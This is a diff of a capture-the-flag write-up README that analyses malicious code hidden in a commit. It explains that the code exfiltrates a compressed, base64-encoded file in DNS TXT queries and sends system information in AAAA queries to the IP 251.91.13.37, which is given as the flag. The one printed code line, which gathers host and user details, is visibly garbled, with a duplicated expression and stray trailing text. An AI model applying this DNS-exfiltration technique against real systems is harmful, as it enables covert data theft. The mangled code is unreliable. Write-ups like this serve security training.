mine-x/ctf-writeups/2025-target-cyber-defense-challenge/8_shadow_commit/README.md

 f"{os.uname().sysname}.{os.uname().machine}.{os.uname().nodename}.{os.getlogin()}"_ = f"{os.uname().sysname}.{os.uname().machine}.{os.uname().nodename}.{os.getlogin()}"q(source, 0o34)
 ```

-We can see that this code is sending DNS queries over UDP to IP address `251.91.13.37` on port DNS.
+This code is sending DNS queries over UDP to IP address `251.91.13.37` on port DNS.
 It reads and compresses a file, encodes it as base64, and splits it into chunks.
-Those chunks get embedded in DNS TXT queries.
+The chunks get embedded in DNS TXT queries.
 System information gets sent in a DNS AAAA query.

 **Flag:** ```251.91.13.37```